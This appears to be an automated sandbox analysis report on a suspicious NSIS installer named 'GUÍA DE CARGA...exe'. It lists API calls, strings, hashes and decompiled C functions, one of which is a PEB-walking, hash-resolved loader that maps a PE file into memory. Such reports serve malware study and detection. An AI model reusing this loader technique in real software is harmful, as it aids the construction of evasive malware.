                        0x00403351
                        0x0040335d
                        0x00000000
                        0x0040335d
                        0x0040330b
                        0x00403318
                        0x0040330f
                        0x00403315
                        0x00000000
                        0x00000000
                        0x00403317
                        0x00403317
                        0x00403317
                        0x0040331c
                        0x0040331e
                        0x00403326
                        0x00403397
                        0x00403399
                        0x004033a0
                        0x004033a8
                        0x004033a8
                        0x004033b3
                        0x004033b8
                        0x004033c7
                        0x004033cb
                        0x004033cc
                        0x004033d5
                        0x004033ce
                        0x004033ce
                        0x004033ce
                        0x004033db
                        0x004033e1
                        0x004033e7
                        0x004033ef
                        0x004033ef
                        0x004033fd
                        0x00403404
                        0x0040340d
                        0x00403413
                        0x00403413
                        0x0040341f
                        0x00403425
                        0x0040342f
                        0x00403439
                        0x0040343f
                        0x00403441
                        0x00403443
                        0x00403444
                        0x00403445
                        0x0040344a
                        0x00403456
                        0x0040345c
                        0x00403463
                        0x00403466
                        0x0040346c
                        0x0040346c
                        0x00403463
                        0x00403441
                        0x00403470
                        0x00403476
                        0x00403476
                        0x00403476
                        0x00403479
                        0x0040347a
                        0x0040347b
                        0x0040347b
                        0x00000000
                        0x004033c7
                        0x00403328
                        0x0040332a
                        0x00403335
                        0x00000000
                        0x00000000
                        0x0040333d
                        0x00403348
                        0x0040334d
                        0x00000000
                        0x0040334d
                        0x004032c2
                        0x004032ce
                        0x004032d3
                        0x004032d8
                        0x004032da
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403277
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00403227
                        0x00403227
                        0x00403227
                        0x00403228
                        0x00403228
                        0x00000000
                        0x00403227
                        0x00000000
                        0x00403178
                        0x00403179
                        0x00403185
                        0x0040318b
                        0x00000000
                        0x0040318d
                        0x0040318f
                        0x00403196
                        0x0040319b
                        0x004031a0
                        0x004031a7
                        0x004031ad
                        0x004031c3
                        0x004031d3
                        0x004031d8
                        0x004031de
                        0x004031e5
                        0x004031f8
                        0x004031fd
                        0x004031ff
                        0x00403201
                        0x00403206
                        0x00403206
                        0x00403216
                        0x0040321c
                        0x00000000
                        0x0040321c

                        APIs
                        • SetErrorMode.KERNELBASE ref: 00403150
                        • GetVersion.KERNEL32 ref: 00403156
                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                        • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                        • OleInitialize.OLE32(00000000), ref: 004031A7
                        • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                        • GetCommandLineA.KERNEL32(dah Setup,NSIS Error), ref: 004031D8
                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00000000), ref: 004031EB
                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00409168), ref: 00403216
                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                        • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                        • OleUninitialize.OLE32(00000020), ref: 00403366
                        • ExitProcess.KERNEL32 ref: 00403386
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00000000,00000020), ref: 00403399
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00000000,00000020), ref: 004033A8
                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00000000,00000020), ref: 004033B3
                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" ,00000000,00000020), ref: 004033BF
                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                        • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe,00428C58,00000001), ref: 00403439
                        • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                        • ExitWindowsEx.USER32 ref: 00403517
                        • ExitProcess.KERNEL32 ref: 0040353A
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                        • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$dah Setup$~nsu
                        • API String ID: 3469842172-1952035269
                        • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                        • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                        • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                        • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004054EC, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                        0x004054f7
                        0x004054fb
                        0x00405504
                        0x00405507
                        0x0040550a
                        0x00405512
                        0x00405514
                        0x00405515
                        0x00000000
                        0x00405515
                        0x00405524
                        0x00405524
                        0x00405527
                        0x0040552a
                        0x0040553e
                        0x00405545
                        0x0040554a
                        0x0040554c
                        0x0040555c
                        0x0040554e
                        0x00405554
                        0x00405554
                        0x00405561
                        0x00405564
                        0x0040556f
                        0x00405575
                        0x0040557a
                        0x0040558a
                        0x0040558c
                        0x00405592
                        0x00405595
                        0x00405598
                        0x00405655
                        0x00405655
                        0x00405659
                        0x0040565b
                        0x0040565b
                        0x0040565b
                        0x0040565b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040559e
                        0x0040559e
                        0x004055a7
                        0x004055ad
                        0x004055b2
                        0x004055b5
                        0x004055b7
                        0x004055bb
                        0x004055bd
                        0x004055bd
                        0x004055bb
                        0x004055c0
                        0x004055c3
                        0x004055d6
                        0x004055d8
                        0x004055dd
                        0x004055e4
                        0x004055fc
                        0x00405602
                        0x00405608
                        0x0040560a
                        0x0040562f
                        0x0040560c
                        0x0040560c
                        0x00405610
                        0x00405624
                        0x00405612
                        0x00405615
                        0x0040561d
                        0x0040561d
                        0x00405610
                        0x004055e6
                        0x004055ec
                        0x004055ee
                        0x004055f4
                        0x004055f4
                        0x004055ee
                        0x00000000
                        0x004055e4
                        0x004055c5
                        0x004055c8
                        0x004055ca
                        0x00000000
                        0x00000000
                        0x004055cc
                        0x004055ce
                        0x00000000
                        0x00000000
                        0x004055d0
                        0x004055d4
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405634
                        0x0040563e
                        0x00405644
                        0x00405644
                        0x0040564f
                        0x00000000
                        0x0040564f
                        0x00405566
                        0x0040556d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040552c
                        0x0040552c
                        0x0040552e
                        0x0040565f
                        0x00405662
                        0x00405665
                        0x004056b7
                        0x004056b7
                        0x004056b7
                        0x00405667
                        0x0040566a
                        0x00405675
                        0x0040567a
                        0x0040567c
                        0x00000000
                        0x00000000
                        0x0040567f
                        0x00405685
                        0x0040568b
                        0x00405691
                        0x00405693
                        0x00000000
                        0x004056af
                        0x00405695
                        0x00405699
                        0x00000000
                        0x00000000
                        0x0040569e
                        0x00000000
                        0x004056a5
                        0x0040566c
                        0x0040566c
                        0x00000000
                        0x0040566c
                        0x00405534
                        0x00405538
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00405538

                        APIs
                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                        • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                        • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                        • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                        • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                        • FindClose.KERNEL32(?), ref: 0040564F
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                        • "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" , xrefs: 004054EC
                        • \*.*, xrefs: 0040554E
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: "C:\Users\user\Desktop\GU#U00cdA DE CARGA...exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                        • API String ID: 2035342205-1780132302
                        • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                        • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                        • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                        • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 7333B472, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 82%
                        			E7333B472(void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				char _v60;
				short _t60;
				short _t61;
				short _t62;
				void* _t78;
				void* _t79;
				void _t81;
				long _t86;
				void* _t91;
				void* _t95;
				void* _t100;
				void* _t102;
				short _t103;
				short _t120;
				signed int _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				void* _t139;
				void* _t141;
				void* _t142;

				_t142 = __eflags;
				_t60 = 0x6e;
				_v60 = _t60;
				_t100 = 0;
				_t61 = 0x74;
				_t103 = 0x64;
				_t120 = 0x6c;
				_v58 = _t61;
				_t62 = 0x2e;
				_v50 = _t62;
				_v56 = _t103;
				_v54 = _t120;
				_v52 = _t120;
				_v48 = _t103;
				_v46 = _t120;
				_v44 = _t120;
				_v42 = 0;
				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				E7333B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
				_v16 = E7333B7E6( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
				_v12 = E7333B7E6(_t137, 0x7fb47add);
				_v32 = E7333B7E6(_t137, 0x7fe7f840);
				_v24 = E7333B7E6(_t137, 0x7fe1f1fb);
				_v28 = E7333B7E6(_t137, 0x7f951704);
				_v36 = E7333B7E6(_t137, 0x7f91a078);
				_t78 = CreateFileW(E7333B7B4( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
				_t138 = _t78;
				_v20 = _t138;
				if(_t138 == 0xffffffff) {
					L13:
					_t139 = _t100;
					L14:
					_t79 = _v20;
					__eflags = _t79;
					if(_t79 != 0) {
						_v24(_t79);
					}
					_v36(0);
					L22:
					while( *_t100 != 0xb8) {
						_t81 =  *_t100;
						__eflags = _t81 - 0xe9;
						if(_t81 != 0xe9) {
							__eflags = _t81 - 0xea;
							if(_t81 != 0xea) {
								_t100 = _t100 + 1;
								__eflags = _t100;
							} else {
								_t100 =  *(_t100 + 1);
							}
						} else {
							_t100 = _t100 + 5 +  *(_t100 + 1);
						}
					}
					_t135 =  *(_t100 + 1);
					if(_t139 != 0) {
						VirtualFree(_t139, 0, 0x8000);
					}
					return _t135;
				}
				_t86 = _v16(_t138, 0);
				_v16 = _t86;
				if(_t86 == 0xffffffff) {
					goto L13;
				}
				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
					goto L13;
				} else {
					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
					_v8 = _t91;
					if(_t91 == 0) {
						_t139 = _t91;
						goto L14;
					}
					E7333B74B(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
					_v12 = _v12 & 0;
					if(0 >=  *(_t141 + 6)) {
						L8:
						_t139 = _v8;
						_t100 = E7333B7E6(_t139, _a4);
						if(_t100 == 0) {
							goto L14;
						}
						_t95 = _v20;
						if(_t95 != 0) {
							FindCloseChangeNotification(_t95);
						}
						VirtualFree(_t136, 0, 0x8000);
						goto L22;
					} else {
						_t102 = _v8;
						_t116 = _v32 + 0x2c + _t141;
						_v16 = _v32 + 0x2c + _t141;
						do {
							E7333B74B( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
							_t133 = _v12 + 1;
							_t116 = _v16 + 0x28;
							_v12 = _t133;
							_v16 = _v16 + 0x28;
						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
						goto L8;
					}
				}
			}










































                        0x7333b472
                        0x7333b47d
                        0x7333b480
                        0x7333b484
                        0x7333b486
                        0x7333b489
                        0x7333b48c
                        0x7333b48d
                        0x7333b493
                        0x7333b494
                        0x7333b49a
                        0x7333b49e
                        0x7333b4a2
                        0x7333b4a6
                        0x7333b4aa
                        0x7333b4ae
                        0x7333b4b2
                        0x7333b4c9
                        0x7333b4d2
                        0x7333b4ea
                        0x7333b4f9
                        0x7333b508
                        0x7333b517
                        0x7333b526
                        0x7333b543
                        0x7333b54c
                        0x7333b54e
                        0x7333b550
                        0x7333b556
                        0x7333b636
                        0x7333b636
                        0x7333b638
                        0x7333b638
                        0x7333b63b
                        0x7333b63d
                        0x7333b640
                        0x7333b640
                        0x7333b645
                        0x00000000
                        0x7333b664
                        0x7333b64a
                        0x7333b64c
                        0x7333b64e
                        0x7333b65a
                        0x7333b65c
                        0x7333b663
                        0x7333b663
                        0x7333b65e
                        0x7333b65e
                        0x7333b65e
                        0x7333b650
                        0x7333b656
                        0x7333b656
                        0x7333b64e
                        0x7333b669
                        0x7333b66e
                        0x7333b678
                        0x7333b678
                        0x7333b683
                        0x7333b683
                        0x7333b55e
                        0x7333b561
                        0x7333b567
                        0x00000000
                        0x00000000
                        0x7333b579
                        0x7333b57d
                        0x00000000
                        0x7333b598
                        0x7333b59d
                        0x7333b5ac
                        0x7333b5af
                        0x7333b5b2
                        0x7333b5b7
                        0x7333b632
                        0x00000000
                        0x7333b632
                        0x7333b5c0
                        0x7333b5c5
                        0x7333b5ce
                        0x7333b607
                        0x7333b607
                        0x7333b614
                        0x7333b618
                        0x00000000
                        0x00000000
                        0x7333b61a
                        0x7333b61f
                        0x7333b622
                        0x7333b622
                        0x7333b62d
                        0x00000000
                        0x7333b5d0
                        0x7333b5d3
                        0x7333b5d9
                        0x7333b5db
                        0x7333b5de
                        0x7333b5ea
                        0x7333b5f5
                        0x7333b5fa
                        0x7333b5fd
                        0x7333b600
                        0x7333b603
                        0x00000000
                        0x7333b5de
                        0x7333b5ce

                        APIs
                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7333B54C
                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,7333B1FA,7FC6FA16,7333B3B9), ref: 7333B576
                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7333B1FA,7FC6FA16), ref: 7333B58D
                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,7333B1FA,7FC6FA16,7333B3B9), ref: 7333B5AF
                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,7333B1FA,7FC6FA16,7333B3B9,00000000,00000000), ref: 7333B622
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,7333B1FA,7FC6FA16,7333B3B9), ref: 7333B62D
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,7333B1FA,7FC6FA16,7333B3B9,00000000), ref: 7333B678
                        Memory Dump Source
                        • Source File: 00000001.00000002.274617389.000000007333B000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
                        • Associated: 00000001.00000002.274590198.0000000073330000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274598463.0000000073331000.00000020.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274606500.0000000073339000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274612115.000000007333A000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274622125.000000007333D000.00000080.00020000.sdmp Download File
                        • Associated: 00000001.00000002.274626294.000000007333E000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                        • String ID:
                        • API String ID: 656311269-0
                        • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                        • Instruction ID: 7adc1ae869f97fc6d1394f3624f10d172997432671f1754a02511a9e06191c95
                        • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                        • Instruction Fuzzy Hash: D5617D75E40708ABDF21CFA4C884BAEB7B9EF49610F548059E506EB391EA749D02CB64
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405EC2, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405EC2(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c0f0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c0f0;
			}




                        0x00405ecd
                        0x00405ed6
                        0x00000000
                        0x00405ee3
                        0x00405ed9
                        0x00000000

                        APIs
                        • FindFirstFileA.KERNELBASE(?,0042C0F0,0042B4A8,004057DE,0042B4A8,0042B4A8,00000000,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                        • FindClose.KERNEL32(00000000), ref: 00405ED9
                        Memory Dump Source
                        • Source File: 00000001.00000002.271748606.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.271698513.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271838429.0000000000407000.00000002.00020000.sdmp Download File
                        • Associated: 00000001.00000002.271873788.0000000000409000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272070100.000000000042C000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272095266.0000000000434000.00000004.00020000.sdmp Download File
                        • Associated: 00000001.00000002.272137068.0000000000437000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Find$CloseFileFirst
                        • String ID:
                        • API String ID: 2295610775-0
                        • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                        • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                        • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                        • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004039B0, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 84%
                        			E004039B0(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42a084 = _t35;
					if(_t115 == 0x110) {
						 *0x42ec28 = _t125;
						 *0x42a098 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x429060 = _t91;
						E00403E83(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e408); // executed
						 *0x42e3ec = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42a084 = 1;
					}
					_t122 =  *0x4091ac; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42ec40;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403ECF(0x40b);
						while(1) {
							_t37 =  *0x42a084;
							 *0x4091ac =  *0x4091ac + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091ac; // 0xffffffff
							__eflags = _t39 -  *0x42ec44; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e3ec - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42ec44; // 0x2
							__eflags =  *0x4091ac - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405BE9(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E83(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E83(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ecac - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
